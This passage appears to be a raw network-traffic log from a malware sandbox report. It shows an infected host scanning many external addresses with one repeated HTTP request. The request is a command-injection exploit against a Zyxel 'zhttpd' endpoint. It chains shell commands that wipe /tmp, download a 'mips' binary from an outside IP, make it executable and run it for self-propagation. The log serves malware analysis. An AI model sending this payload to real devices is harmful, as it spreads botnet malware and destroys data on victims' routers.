                                        Mar 31, 2024 09:20:45.420206070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2110192.168.2.234557048.36.6.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420291901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2111192.168.2.2359890108.145.22.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420388937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2112192.168.2.2359326132.254.3.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420495987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2113192.168.2.2354340172.187.119.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420569897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2114192.168.2.2335574143.14.192.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420646906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2115192.168.2.235213419.207.208.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420711994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2116192.168.2.2355610137.12.154.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420814037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2117192.168.2.234233214.37.54.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.420892954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2118192.168.2.234860894.23.129.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421008110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2119192.168.2.2346620105.95.198.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421060085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2120192.168.2.234726054.168.160.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421133995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2121192.168.2.235646849.184.208.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421204090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2122192.168.2.235596049.44.82.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421272993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2123192.168.2.233578440.246.219.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421353102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2124192.168.2.2357776143.88.108.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421477079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2125192.168.2.2337732188.68.126.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421539068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2126192.168.2.235489497.202.6.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421631098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2127192.168.2.2348702184.130.26.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421693087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2128192.168.2.2335598187.27.255.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421753883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2129192.168.2.233638472.140.81.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421833038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2130192.168.2.2341150168.252.153.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421892881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2131192.168.2.234530887.202.237.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.421993017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2132192.168.2.2345436190.183.117.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422049046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2133192.168.2.2343760176.80.235.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422120094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2134192.168.2.234411269.54.41.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422177076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2135192.168.2.2350060193.64.96.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422241926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2136192.168.2.2350694200.159.244.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422329903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2137192.168.2.2352562166.87.191.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422375917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2138192.168.2.2356258217.32.242.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422434092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2139192.168.2.2353612166.77.13.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422514915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2140192.168.2.235816414.144.63.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422590017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2141192.168.2.2347042148.217.188.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422652960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2142192.168.2.2354964131.209.74.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422732115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2143192.168.2.2349906161.190.114.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422813892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2144192.168.2.233810061.49.148.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422869921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2145192.168.2.233463265.10.61.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.422945976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2146192.168.2.2360638170.142.131.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423010111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2147192.168.2.2343540167.62.32.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423088074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2148192.168.2.2343542201.240.77.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423160076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2149192.168.2.234021639.144.15.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423216105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2150192.168.2.2339834213.110.82.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423326969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2151192.168.2.233456284.23.229.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423386097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2152192.168.2.234610465.222.156.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423500061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2153192.168.2.233925874.17.245.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423566103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2154192.168.2.233756682.246.169.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423650026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2155192.168.2.2335704172.172.160.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423701048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2156192.168.2.2336780170.157.95.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423757076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2157192.168.2.235506061.206.82.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423816919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2158192.168.2.2360198138.156.50.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423870087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2159192.168.2.2333332213.116.7.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423917055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2160192.168.2.235832071.244.38.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.423985958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2161192.168.2.234214859.219.137.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424057961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2162192.168.2.233909242.182.121.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424132109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2163192.168.2.2351294221.90.159.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424185038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2164192.168.2.236046244.10.141.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424247980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2165192.168.2.235718290.227.253.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424309969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2166192.168.2.235981670.240.107.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424369097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2167192.168.2.235700047.29.102.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424433947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2168192.168.2.2351350171.57.245.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424503088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2169192.168.2.2346020177.207.83.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424561977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2170192.168.2.2356276128.214.38.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424631119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2171192.168.2.2344150106.243.85.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424685001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2172192.168.2.236053874.45.49.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424732924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2173192.168.2.235477886.230.217.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424804926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2174192.168.2.235574260.218.113.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424854994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2175192.168.2.235061642.37.89.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424916029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2176192.168.2.2338498165.219.76.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.424982071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2177192.168.2.2354552172.203.135.30443
                                        TimestampBytes transferredDirectionData
